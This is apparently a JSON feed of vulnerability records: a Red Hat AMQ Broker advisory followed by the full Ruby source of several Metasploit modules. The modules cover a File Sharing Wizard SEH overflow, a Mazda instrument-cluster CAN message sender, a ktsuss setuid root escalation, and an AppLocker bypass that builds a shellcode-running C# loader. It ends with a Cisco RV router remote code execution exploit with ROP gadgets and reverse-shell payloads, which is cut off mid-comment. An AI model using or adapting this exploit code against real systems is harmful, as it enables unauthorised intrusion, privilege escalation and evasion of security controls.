{"redhat": [{"lastseen": "2019-10-10T07:30:58", "bulletinFamily": "unix", "description": "AMQ Broker is a high-performance messaging implementation based on ActiveMQ Artemis. It uses an asynchronous journal for fast message persistence, and supports multiple languages, protocols, and platforms. \n\nThis release of Red Hat A-MQ Broker 7.5.0 serves as a replacement for Red Hat A-MQ Broker 7.4.1, and includes security and bug fixes, and enhancements. For further information, refer to the release notes linked to in the References section.\n\nSecurity Fix(es):\n\n* Apache Struts 1: Class Loader manipulation via request parameters (CVE-2014-0114)\n\nFor more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.", "modified": "2019-10-10T11:19:11", "published": "2019-10-10T11:18:55", "id": "RHSA-2019:2995", "href": "https://access.redhat.com/errata/RHSA-2019:2995", "type": "redhat", "title": "(RHSA-2019:2995) Important: Red Hat A-MQ Broker 7.5 release and security update", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "metasploit": [{"lastseen": "2019-10-15T05:30:30", "bulletinFamily": "exploit", "description": "This module exploits an unauthenticated HTTP POST SEH-based buffer overflow in File Sharing Wizard 1.5.0.\n", "modified": "2019-10-08T10:44:41", "published": "2019-10-02T15:08:54", "id": "MSF:EXPLOIT/WINDOWS/HTTP/FILE_SHARING_WIZARD_SEH", "href": "", "type": "metasploit", "title": "File Sharing Wizard - POST SEH Overflow", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = NormalRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::Seh\n\n def initialize(info = {})\n super update_info(info,\n 'Name' => 'File Sharing Wizard - POST SEH Overflow',\n 'Description' => %q(\n This module exploits an unauthenticated HTTP POST SEH-based buffer overflow in File Sharing Wizard 1.5.0.\n ),\n 'Author' => [\n 'x00pwn', # Original exploit\n 'Dean Welch <dean_welch[at]rapid7.com>' # Module\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n %w[CVE 2019-16724],\n %w[EDB 47412]\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\\x20\"\n },\n 'DisclosureDate' => '2019-09-24',\n 'DefaultOptions' =>\n {\n 'RPORT' => 80,\n 'PAYLOAD' => 'windows/meterpreter/reverse_tcp'\n },\n 'Platform' => 'win',\n 'Arch' => [ ARCH_X86 ],\n 'Targets' =>\n [\n ['Windows Vista / Windows 7 (x86)', { 'Offset' => 1040, 'Ret' => 0x7c38a67f }] # 0x7c38a67f : pop ecx # pop ecx # ret | {PAGE_EXECUTE_READ} [MSVCR71.dll]\n ])\n end\n\n def check\n res = send_request_cgi\n if res.nil?\n fail_with(Failure::Unreachable, 'Connection timed out.')\n end\n # Checks for the `WWW-Authenticate` header in the response\n if res.code && res.code == 401 && res.headers['WWW-Authenticate'].include?('Basic realm=\"File Sharing Wizard\"')\n CheckCode::Detected\n else\n CheckCode::Safe\n end\n end\n\n def exploit\n buf = rand_text_english(target['Offset'])\n buf << generate_seh_payload(target.ret)\n print_status('Sending payload to target')\n send_request_raw({ 'method' => 'POST', 'uri' => buf }, 0)\n end\n\nend\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/http/file_sharing_wizard_seh.rb"}, {"lastseen": "2019-10-16T00:28:19", "bulletinFamily": "exploit", "description": "This module moves the needle of the accelorometer and speedometer of the Mazda 2 instrument cluster\n", "modified": "2019-09-13T01:32:21", "published": "2019-09-11T16:07:42", "id": "MSF:POST/HARDWARE/AUTOMOTIVE/MAZDA_IC_MOVER", "href": "", "type": "metasploit", "title": "Mazda 2 Instrument Cluster Accelorometer Mover", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Post\n\n def initialize(info={})\n super( update_info( info,\n 'Name' => 'Mazda 2 Instrument Cluster Accelorometer Mover',\n 'Description' => %q{ This module moves the needle of the accelorometer and speedometer of the Mazda 2 instrument cluster},\n 'License' => MSF_LICENSE,\n 'Author' => ['Jay Turla'],\n 'Platform' => ['hardware'],\n 'SessionTypes' => ['hwbridge']\n ))\n register_options([\n OptString.new('CANBUS', [false, \"CAN Bus to perform scan on, defaults to connected bus\", nil])\n ])\n end\n\n def run\n unless client.automotive\n print_error(\"The hwbridge requires a functional automotive extention\")\n return\n end\n print_status(\"Moving the accelorometer and speedometer...\")\n client.automotive.cansend(datastore['CANBUS'], \"202\", \"6001606060606000\")\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/post/hardware/automotive/mazda_ic_mover.rb"}, {"lastseen": "2019-10-16T19:46:20", "bulletinFamily": "exploit", "description": "This module attempts to gain root privileges by exploiting a vulnerability in ktsuss versions 1.4 and prior. The ktsuss executable is setuid root and does not drop privileges prior to executing user specified commands, resulting in command execution with root privileges. This module has been tested successfully on: ktsuss 1.3 on SparkyLinux 6 (2019.08) (LXQT) (x64); and ktsuss 1.3 on SparkyLinux 5.8 (LXQT) (x64).\n", "modified": "2019-09-02T17:31:30", "published": "2019-08-19T13:28:02", "id": "MSF:EXPLOIT/LINUX/LOCAL/KTSUSS_SUID_PRIV_ESC", "href": "", "type": "metasploit", "title": "ktsuss suid Privilege Escalation", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = ExcellentRanking\n\n include Msf::Post::File\n include Msf::Post::Linux::Priv\n include Msf::Post::Linux::System\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'ktsuss suid Privilege Escalation',\n 'Description' => %q{\n This module attempts to gain root privileges by exploiting\n a vulnerability in ktsuss versions 1.4 and prior.\n\n The ktsuss executable is setuid root and does not drop\n privileges prior to executing user specified commands,\n resulting in command execution with root privileges.\n\n This module has been tested successfully on:\n\n ktsuss 1.3 on SparkyLinux 6 (2019.08) (LXQT) (x64); and\n ktsuss 1.3 on SparkyLinux 5.8 (LXQT) (x64).\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'John Lightsey', # Discovery and exploit\n 'bcoles' # Metasploit\n ],\n 'DisclosureDate' => '2011-08-13',\n 'References' =>\n [\n ['CVE', '2011-2921'],\n ['URL', 'https://www.openwall.com/lists/oss-security/2011/08/13/2'],\n ['URL', 'https://security.gentoo.org/glsa/201201-15'],\n ['URL', 'https://github.com/bcoles/local-exploits/blob/master/CVE-2011-2921/ktsuss-lpe.sh']\n ],\n 'Platform' => ['linux'],\n 'Arch' =>\n [\n ARCH_X86,\n ARCH_X64,\n ARCH_ARMLE,\n ARCH_AARCH64,\n ARCH_PPC,\n ARCH_MIPSLE,\n ARCH_MIPSBE\n ],\n 'SessionTypes' => ['shell', 'meterpreter'],\n 'Targets' => [['Auto', {}]],\n 'DefaultOptions' =>\n {\n 'AppendExit' => true,\n 'PrependSetresuid' => true,\n 'PrependSetresgid' => true,\n 'PrependSetreuid' => true,\n 'PrependSetuid' => true,\n 'PrependFork' => true\n },\n 'DefaultTarget' => 0))\n register_options [\n OptString.new('KTSUSS_PATH', [true, 'Path to staprun executable', '/usr/bin/ktsuss'])\n ]\n register_advanced_options [\n OptBool.new('ForceExploit', [false, 'Override check result', false]),\n OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])\n ]\n end\n\n def ktsuss_path\n datastore['KTSUSS_PATH']\n end\n\n def base_dir\n datastore['WritableDir'].to_s\n end\n\n def upload(path, data)\n print_status \"Writing '#{path}' (#{data.size} bytes) ...\"\n rm_f path\n write_file path, data\n register_file_for_cleanup path\n end\n\n def upload_and_chmodx(path, data)\n upload path, data\n chmod path\n end\n\n def check\n unless setuid? ktsuss_path\n vprint_error \"#{ktsuss_path} is not setuid\"\n return CheckCode::Safe\n end\n vprint_good \"#{ktsuss_path} is setuid\"\n\n id = cmd_exec 'whoami'\n res = cmd_exec(\"#{ktsuss_path} -u #{id} id\").to_s\n vprint_status res\n\n unless res.include? 'uid=0'\n return CheckCode::Safe\n end\n\n CheckCode::Vulnerable\n end\n\n def exploit\n unless check == CheckCode::Vulnerable\n unless datastore['ForceExploit']\n fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'\n end\n print_warning 'Target does not appear to be vulnerable'\n end\n\n if is_root?\n unless datastore['ForceExploit']\n fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'\n end\n end\n\n unless writable? base_dir\n fail_with Failure::BadConfig, \"#{base_dir} is not writable\"\n end\n\n payload_name = \".#{rand_text_alphanumeric 10..15}\"\n payload_path = \"#{base_dir}/#{payload_name}\"\n upload_and_chmodx payload_path, generate_payload_exe\n\n print_status 'Executing payload ...'\n id = cmd_exec 'whoami'\n res = cmd_exec \"#{ktsuss_path} -u #{id} #{payload_path} & echo \"\n vprint_line res\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/local/ktsuss_suid_priv_esc.rb"}, {"lastseen": "2019-10-11T12:24:18", "bulletinFamily": "exploit", "description": "This module will assist you in evading Microsoft Windows Applocker and Software Restriction Policies. This technique utilises the Microsoft signed binary PresentationHost.exe to execute user supplied code.\n", "modified": "2019-08-03T09:41:13", "published": "2019-08-01T07:40:30", "id": "MSF:EVASION/WINDOWS/APPLOCKER_EVASION_PRESENTATIONHOST", "href": "", "type": "metasploit", "title": "Applocker Evasion - Windows Presentation Foundation Host", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Evasion\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Applocker Evasion - Windows Presentation Foundation Host',\n 'Description' => %(\n This module will assist you in evading Microsoft\n Windows Applocker and Software Restriction Policies.\n This technique utilises the Microsoft signed binary\n PresentationHost.exe to execute user supplied code.\n ),\n 'Author' =>\n [\n 'Nick Tyrer <@NickTyrer>', # module development\n 'Casey Smith' # presentationhost bypass research\n ],\n 'License' => 'MSF_LICENSE',\n 'Platform' => 'win',\n 'Arch' => [ARCH_X86],\n 'Targets' => [['Microsoft Windows', {}]])\n )\n\n register_options(\n [\n OptString.new('CS_FILE', [true, 'Filename for the .xaml.cs file (default: presentationhost.xaml.cs)', 'presentationhost.xaml.cs']),\n OptString.new('MANIFEST_FILE', [true, 'Filename for the .manifest file (default: presentationhost.manifest)', 'presentationhost.manifest']),\n OptString.new('CSPROJ_FILE', [true, 'Filename for the .csproj file (default: presentationhost.csproj)', 'presentationhost.csproj'])\n ]\n )\n\n deregister_options('FILENAME')\n end\n\n def build_payload\n Rex::Text.encode_base64(payload.encoded)\n end\n\n def obfu\n Rex::Text.rand_text_alpha 8\n end\n\n def presentationhost_xaml_cs\n esc = build_payload\n mod = [obfu, obfu, obfu, obfu, obfu, obfu, obfu, obfu, obfu, obfu, obfu]\n <<~HEREDOC\n using System;\n class #{mod[0]}{\n static void Main(string[] args){\n IntPtr #{mod[1]};\n #{mod[1]} = GetConsoleWindow();\n ShowWindow(#{mod[1]}, #{mod[2]});\n string #{mod[3]} = \"#{esc}\";\n byte[] #{mod[4]} = Convert.FromBase64String(#{mod[3]});\n byte[] #{mod[5]} = #{mod[4]};\n IntPtr #{mod[6]} = VirtualAlloc(IntPtr.Zero, (UIntPtr)#{mod[5]}.Length, #{mod[7]}, #{mod[8]});\n System.Runtime.InteropServices.Marshal.Copy(#{mod[5]}, 0, #{mod[6]}, #{mod[5]}.Length);\n IntPtr #{mod[9]} = IntPtr.Zero;\n WaitForSingleObject(CreateThread(#{mod[9]}, UIntPtr.Zero, #{mod[6]}, #{mod[9]}, 0, ref #{mod[9]}), #{mod[10]});}\n private static Int32 #{mod[7]}=0x1000;\n private static IntPtr #{mod[8]}=(IntPtr)0x40;\n private static UInt32 #{mod[10]} = 0xFFFFFFFF;\n [System.Runtime.InteropServices.DllImport(\"kernel32\")]\n private static extern IntPtr VirtualAlloc(IntPtr a, UIntPtr s, Int32 t, IntPtr p);\n [System.Runtime.InteropServices.DllImport(\"kernel32\")]\n private static extern IntPtr CreateThread(IntPtr att, UIntPtr st, IntPtr sa, IntPtr p, Int32 c, ref IntPtr id);\n [System.Runtime.InteropServices.DllImport(\"kernel32\")]\n private static extern UInt32 WaitForSingleObject(IntPtr h, UInt32 ms);\n [System.Runtime.InteropServices.DllImport(\"user32.dll\")]\n static extern bool ShowWindow(IntPtr #{mod[1]}, int nCmdShow);\n [System.Runtime.InteropServices.DllImport(\"Kernel32\")]\n private static extern IntPtr GetConsoleWindow();\n const int #{mod[2]} = 0;}\n HEREDOC\n end\n\n def presentationhost_manifest\n <<~HEREDOC\n <?xml version=\"1.0\" encoding=\"utf-8\"?>\n <assembly manifestVersion=\"1.0\" xmlns=\"urn:schemas-microsoft-com:asm.v1\">\n <assemblyIdentity version=\"1.0.0.0\" name=\"MyApplication.app\" />\n <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v2\">\n <security>\n <applicationRequestMinimum>\n <defaultAssemblyRequest permissionSetReference=\"Custom\" />\n <PermissionSet class=\"System.Security.PermissionSet\" version=\"1\" ID=\"Custom\" SameSite=\"site\" Unrestricted=\"true\" />\n </applicationRequestMinimum>\n <requestedPrivileges xmlns=\"urn:schemas-microsoft-com:asm.v3\">\n <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\" />\n </requestedPrivileges>\n </security>\n </trustInfo>\n </assembly>\n HEREDOC\n end\n\n def presentationhost_csproj\n <<~HEREDOC\n <?xml version=\"1.0\" encoding=\"utf-8\"?>\n <Project ToolsVersion=\"4.0\" xmlns=\"http://schemas.microsoft.com/developer/msbuild/2003\">\n <Import Project=\"$(MSBuildExtensionsPath)\\\\$(MSBuildToolsVersion)\\\\Microsoft.Common.props\" Condition=\"Exists('$(MSBuildExtensionsPath)\\\\$(MSBuildToolsVersion)\\\\Microsoft.Common.props')\" />\n <PropertyGroup>\n <Configuration Condition=\" '$(Configuration)' == '' \">Release</Configuration>\n <Platform Condition=\" '$(Platform)' == '' \">x86</Platform>\n <OutputType>WinExe</OutputType>\n <HostInBrowser>true</HostInBrowser>\n <GenerateManifests>true</GenerateManifests>\n <SignManifests>false</SignManifests>\n </PropertyGroup>\n <PropertyGroup Condition=\" '$(Configuration)|$(Platform)' == 'Release|x86' \">\n <Optimize>true</Optimize>\n <OutputPath>.</OutputPath>\n </PropertyGroup>\n <ItemGroup>\n <Reference Include=\"System\" />\n </ItemGroup>\n <ItemGroup>\n <Compile Include=\"#{datastore['CS_FILE']}\">\n <DependentUpon>#{datastore['CS_FILE']}</DependentUpon>\n <SubType>Code</SubType>\n </Compile>\n </ItemGroup>\n <ItemGroup>\n <None Include=\"#{datastore['MANIFEST_FILE']}\" />\n </ItemGroup>\n <Import Project=\"$(MSBuildToolsPath)\\\\Microsoft.CSharp.targets\" />\n </Project>\n HEREDOC\n end\n\n def file_format_filename(name = '')\n name.empty? ? @fname : @fname = name\n end\n\n def create_files\n f1 = datastore['CS_FILE'].empty? ? 'presentationhost.xaml.cs' : datastore['CS_FILE']\n f1 << '.xaml.cs' unless f1.downcase.end_with?('.xaml.cs')\n f2 = datastore['MANIFEST_FILE'].empty? ? 'presentationhost.manifest' : datastore['MANIFEST_FILE']\n f2 << '.manifest' unless f2.downcase.end_with?('.manifest')\n f3 = datastore['CSPROJ_FILE'].empty? ? 'presentationhost.csproj' : datastore['CSPROJ_FILE']\n f3 << '.csproj' unless f3.downcase.end_with?('.csproj')\n cs_file = presentationhost_xaml_cs\n manifest_file = presentationhost_manifest\n csproj_file = presentationhost_csproj\n file_format_filename(f1)\n file_create(cs_file)\n file_format_filename(f2)\n file_create(manifest_file)\n file_format_filename(f3)\n file_create(csproj_file)\n end\n\n def instructions\n print_status \"Copy #{datastore['CS_FILE']}, #{datastore['MANIFEST_FILE']} and #{datastore['CSPROJ_FILE']} to the target\"\n print_status \"Compile using: C:\\\\Windows\\\\Microsoft.Net\\\\Framework\\\\[.NET Version]\\\\MSBuild.exe #{datastore['CSPROJ_FILE']}\"\n print_status \"Execute using: C:\\\\Windows\\\\System32\\\\PresentationHost.exe [Full Path To] #{datastore['CS_FILE'].gsub('.xaml.cs', '.xbap')}\"\n end\n\n def run\n create_files\n instructions\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/evasion/windows/applocker_evasion_presentationhost.rb"}, {"lastseen": "2019-10-11T21:33:14", "bulletinFamily": "exploit", "description": "A vulnerability in the web-based management interface of the Cisco RV110W Wireless-N VPN Firewall, Cisco RV130W Wireless-N Multifunction VPN Router, and Cisco RV215W Wireless-N VPN Router could allow an unauthenticated, remote attacker to execute arbitrary code on an affected device. The vulnerability is due to improper validation of user-supplied data in the web-based management interface. An attacker could exploit this vulnerability by sending malicious HTTP requests to a targeted device. A successful exploit could allow the attacker to execute arbitrary code on the underlying operating system of the affected device as a high-privilege user. RV110W Wireless-N VPN Firewall versions prior to 1.2.2.1 are affected. RV130W Wireless-N Multifunction VPN Router versions prior to 1.0.3.45 are affected. RV215W Wireless-N VPN Router versions prior to 1.3.1.1 are affected. Note: successful exploitation may not result in a session, and as such, on_new_session will never repair the HTTP server, leading to a denial-of-service condition.\n", "modified": "2019-08-30T17:03:43", "published": "2019-07-27T08:47:58", "id": "MSF:EXPLOIT/LINUX/HTTP/CVE_2019_1663_CISCO_RMI_RCE", "href": "", "type": "metasploit", "title": "Cisco RV110W/RV130(W)/RV215W Routers Management Interface Remote Command Execution", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\n# linux/armle/meterpreter/bind_tcp -> segfault\n# linux/armle/meterpreter/reverse_tcp -> segfault\n# linux/armle/meterpreter_reverse_http -> works\n# linux/armle/meterpreter_reverse_https -> works\n# linux/armle/meterpreter_reverse_tcp -> works\n# linux/armle/shell/bind_tcp -> segfault\n# linux/armle/shell/reverse_tcp -> segfault\n# linux/armle/shell_bind_tcp -> segfault\n# linux/armle/shell_reverse_tcp -> segfault\n#\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::CmdStager\n include Msf::Exploit::Deprecated\n\n moved_from 'exploit/linux/http/cisco_rv130_rmi_rce'\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Cisco RV110W/RV130(W)/RV215W Routers Management Interface Remote Command Execution',\n 'Description' => %q{\n A vulnerability in the web-based management interface of the Cisco RV110W Wireless-N VPN Firewall,\n Cisco RV130W Wireless-N Multifunction VPN Router, and Cisco RV215W Wireless-N VPN Router\n could allow an unauthenticated, remote attacker to execute arbitrary code on an affected device.\n\n The vulnerability is due to improper validation of user-supplied data in the web-based management interface.\n An attacker could exploit this vulnerability by sending malicious HTTP requests to a targeted device.\n\n A successful exploit could allow the attacker to execute arbitrary code on the underlying operating\n system of the affected device as a high-privilege user.\n\n RV110W Wireless-N VPN Firewall versions prior to 1.2.2.1 are affected.\n RV130W Wireless-N Multifunction VPN Router versions prior to 1.0.3.45 are affected.\n RV215W Wireless-N VPN Router versions prior to 1.3.1.1 are affected.\n\n Note: successful exploitation may not result in a session, and as such,\n on_new_session will never repair the HTTP server, leading to a denial-of-service condition.\n },\n 'Author' =>\n [\n 'Yu Zhang', # Initial discovery (GeekPwn conference)\n 'Haoliang Lu', # Initial discovery (GeekPwn conference)\n 'T. Shiomitsu', # Initial discovery (Pen Test Partners)\n 'Quentin Kaiser <kaiserquentin@gmail.com>' # Vulnerability analysis & exploit dev\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => %w[linux],\n 'Arch' => [ARCH_ARMLE, ARCH_MIPSLE],\n 'SessionTypes' => %w[meterpreter],\n 'CmdStagerFlavor' => %w{ wget },\n 'Privileged' => true, # BusyBox\n 'References' =>\n [\n ['CVE', '2019-1663'],\n ['BID', '107185'],\n ['URL', 'https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190227-rmi-cmd-ex'],\n ['URL', 'https://www.pentestpartners.com/security-blog/cisco-rv130-its-2019-but-yet-strcpy/']\n ],\n 'DefaultOptions' => {\n 'WfsDelay' => 10,\n 'SSL' => true,\n 'RPORT' => 443,\n 'CMDSTAGER::FLAVOR' => 'wget',\n 'PAYLOAD' => 'linux/mipsle/meterpreter_reverse_tcp',\n },\n 'Targets' =>\n [\n [ 'Cisco RV110W 1.1.0.9',\n {\n 'offset' => 69,\n 'libc_base_addr' => 0x2af06000,\n 'libcrypto_base_addr' => 0x2ac01000,\n 'system_offset' => 0x00050d40,\n 'got_offset' => 0x0009d560,\n # gadget 1 is in /usr/lib/libcrypto.so\n 'gadget1' => 0x00167c8c, # addiu $s0, $sp, 0x20; move $t9, $s4; jalr $t9; move $a0, $s0;\n 'Arch' => ARCH_MIPSLE,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'linux/mipsle/meterpreter_reverse_tcp',\n }\n }\n ],\n [ 'Cisco RV110W 1.2.0.9',\n {\n 'offset' => 69,\n 'libc_base_addr' => 0x2af08000,\n 'libcrypto_base_addr' => 0x2ac03000,\n 'system_offset' => 0x0004c7e0,\n 'got_offset' => 0x00098db0,\n # gadget 1 is in /usr/lib/libcrypto.so\n 'gadget1' => 0x00167c4c, # addiu $s0, $sp, 0x20; move $t9, $s4; jalr $t9; move $a0, $s0;\n 'Arch' => ARCH_MIPSLE,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'linux/mipsle/meterpreter_reverse_tcp',\n }\n }\n ],\n [ 'Cisco RV110W 1.2.0.10',\n {\n 'offset' => 69,\n 'libc_base_addr' => 0x2af09000,\n 'libcrypto_base_addr' => 0x2ac04000,\n 'system_offset' => 0x0004c7e0,\n 'got_offset' => 0x00098db0,\n # gadget 1 is in /usr/lib/libcrypto.so\n 'gadget1' => 0x00151fbc, # addiu $s0, $sp, 0x20; move $t9, $s4; jalr $t9; move $a0, $s0;\n 'Arch' => ARCH_MIPSLE,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'linux/mipsle/meterpreter_reverse_tcp',\n }\n }\n ],\n [ 'Cisco RV110W 1.2.1.4',\n {\n 'offset' => 69,\n 'libc_base_addr' => 0x2af54000,\n 'libcrypto_base_addr' => 0x2ac4f000,\n 'system_offset' => 0x0004c7e0,\n 'got_offset' => 0x00098db0,\n # gadget 1 is in /usr/lib/libcrypto.so\n 'gadget1' => 0x0005059c, # addiu $s0, $sp, 0x20; move $t9, $s4; jalr $t9; move $a0, $s0;\n 'Arch' => ARCH_MIPSLE,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'linux/mipsle/meterpreter_reverse_tcp',\n }\n }\n ],\n [ 'Cisco RV110W 1.2.1.7',\n {\n 'offset' => 69,\n 'libc_base_addr' => 0x2af98000,\n 'libcrypto_base_addr' => 0x2ac4f000,\n 'system_offset' => 0x0004c7e0,\n 'got_offset' => 0x00098db0,\n # gadget 1 is in /usr/lib/libcrypto.so\n 'gadget1' => 0x0003e7dc, # addiu $s0, $sp, 0x20; move $t9, $s4; jalr $t9; move $a0, $s0;\n 'Arch' => ARCH_MIPSLE,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'linux/mipsle/meterpreter_reverse_tcp',\n }\n }\n ],\n [ 'Cisco RV130/RV130W < 1.0.3.45',\n {\n 'offset' => 446,\n 'libc_base_addr' => 0x357fb000,\n 'system_offset' => 0x0004d144,\n 'gadget1' => 0x00020e79, # pop {r2, r6, pc};\n 'gadget2' => 0x00041308, # mov r0, sp; blx r2;\n 'Arch' => ARCH_ARMLE,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'linux/armle/meterpreter_reverse_tcp',\n }\n },\n ],\n [ 'Cisco RV215W 1.1.0.5',\n {\n 'offset' => 69,\n 'libc_base_addr' => 0x2af59000,\n 'libcrypto_base_addr' => 0x2ac54000,\n 'system_offset' => 0x0004c7e0,\n 'got_offset' => 0x00098db0,\n # gadget 1 is in /usr/lib/libcrypto.so\n 'gadget1' => 0x0005059c, # addiu $s0, $sp, 0x20; move $t9, $s4; jalr $t9; move $a0, $s0;\n 'Arch' => ARCH_MIPSLE,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'linux/mipsle/meterpreter_reverse_tcp',\n }\n }\n ],\n [ 'Cisco RV215W 1.1.0.6',\n {\n 'offset' => 69,\n 'libc_base_addr' => 0x2af59000,\n 'libcrypto_base_addr' => 0x2ac54000,\n 'system_offset' => 0x0004c7e0,\n 'got_offset' => 0x00098db0,\n # gadget 1 is in /usr/lib/libcrypto.so\n 'gadget1' => 0x00151fbc, # addiu $s0, $sp, 0x20; move $t9, $s4; jalr $t9; move $a0, $s0;\n 'Arch' => ARCH_MIPSLE,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'linux/mipsle/meterpreter_reverse_tcp',\n }\n }\n ],\n [ 'Cisco RV215W 1.2.0.14',\n {\n 'offset' => 69,\n 'libc_base_addr' => 0x2af5f000,\n 'libcrypto_base_addr' => 0x2ac5a001,\n 'system_offset' => 0x0004c7e0,\n 'got_offset' => 0x00098db0,\n # gadget 1 is in /usr/lib/libcrypto.so\n 'gadget1' => 0x0005059c, # addiu $s0, $sp, 0x20; move $t9, $s4; jalr $t9; move $a0, $s0;\n 'Arch' => ARCH_MIPSLE,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'linux/mipsle/meterpreter_reverse_tcp',\n }\n }\n ],\n [ 'Cisco RV215W 1.2.0.15',\n {\n 'offset' => 69,\n 'libc_base_addr' => 0x2af5f000,\n 'libcrypto_base_addr' => 0x2ac5a000,\n 'system_offset' => 0x0004c7e0,\n 'got_offset' => 0x00098db0,\n # gadget 1 is in /usr/lib/libcrypto.so\n 'gadget1' => 0x0005059c, # addiu $s0, $sp, 0x20; move $t9, $s4; jalr $t9; move $a0, $s0;\n 'Arch' => ARCH_MIPSLE,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'linux/mipsle/meterpreter_reverse_tcp',\n }\n }\n ],\n [ 'Cisco RV215W 1.3.0.7',\n {\n 'offset' => 77,\n 'libc_base_addr' => 0x2afeb000,\n 'libcrypto_base_addr' => 0x2aca5000,\n 'system_offset' => 0x0004c7e0,\n 'got_offset' => 0x000a0530,\n # gadget 1 is in /usr/lib/libcrypto.so\n 'gadget1' => 0x00057bec, # addiu $s0, $sp, 0x20; move $t9, $s4; jalr $t9; move $a0, $s0;\n 'Arch' => ARCH_MIPSLE,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'linux/mipsle/meterpreter_reverse_tcp',\n }\n }\n ],\n [ 'Cisco RV215W 1.3.0.8',\n {\n 'offset' => 77,\n 'libc_base_addr' => 0x2afee000,\n 'libcrypto_base_addr' => 0x2aca5000,\n 'system_offset' => 0x0004c7e0,\n 'got_offset' => 0x000a0530,\n # gadget 1 is in /usr/lib/libcrypto.so\n 'gadget1' => 0x0003e7dc, # addiu $s0, $sp, 0x20; move $t9, $s4; jalr $t9; move $a0, $s0;\n 'Arch' => ARCH_MIPSLE,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'linux/mipsle/meterpreter_reverse_tcp',\n }\n }\n ],\n ],\n 'DisclosureDate' => 'Feb 27 2019',\n 'DefaultTarget' => 0,\n 'Notes' => {\n 'Stability' => [ CRASH_SERVICE_DOWN, ],\n },\n ))\n end\n\n def p(lib, offset)\n [(lib + offset).to_s(16)].pack('H*').reverse\n end\n\n def prepare_shellcode(cmd)\n case target\n # RV110W 1.1.0.9, 1.2.0.9, 1.2.0.10, 1.2.1.4, 1.2.1.7\n # RV215W 1.1.0.5, 1.1.0.6, 1.2.0.14, 1.2.0.15, 1.3.0.7, 1.3.0.8\n when targets[0], targets[1], targets[2], targets[3], targets[4], targets[6], targets[7], targets[8], targets[9], targets[10], targets[11]\n shellcode = rand_text_alpha(target['offset']) + # filler\n rand_text_alpha(4) + # $s0\n rand_text_alpha(4) + # $s1\n rand_text_alpha(4) + # $s2\n rand_text_alpha(4) + # $s3\n p(target['libc_base_addr'], target['system_offset']) + # $s4\n rand_text_alpha(4) + # $s5\n rand_text_alpha(4) + # $s6\n rand_text_alpha(4) + # $s7\n rand_text_alpha(4) + # $s8\n p(target['libcrypto_base_addr'], target['gadget1']) + # $ra\n p(target['libc_base_addr'], target['got_offset']) +\n rand_text_alpha(28) +\n cmd\n shellcode\n when targets[5] # RV130/RV130W\n shellcode = rand_text_alpha(target['offset']) + # filler\n p(target['libc_base_addr'], target['gadget1']) +\n p(target['libc_base_addr'], target['system_offset']) + # r2\n rand_text_alpha(4) + # r6\n p(target['libc_base_addr'], target['gadget2']) + # pc\n cmd\n shellcode\n end\n end\n\n def send_request(buffer)\n begin\n send_request_cgi({\n 'uri' => '/login.cgi',\n 'method' => 'POST',\n 'vars_post' => {\n \"submit_button\": \"login\",\n \"submit_type\": \"\",\n \"gui_action\": \"\",\n \"wait_time\": 0,\n \"change_action\": \"\",\n \"enc\": 1,\n \"user\": rand_text_alpha_lower(5),\n \"pwd\": buffer,\n \"sel_lang\": \"EN\"\n }\n })\n rescue ::Rex::ConnectionError\n fail_with(Failure::Unreachable, \"#{peer} - Failed to connect to the router\")\n end\n end\n\n def check\n\n # We fingerprint devices using SHA1 hash of a web resource accessible to unauthenticated users.\n # We use lang_pack/EN.js because 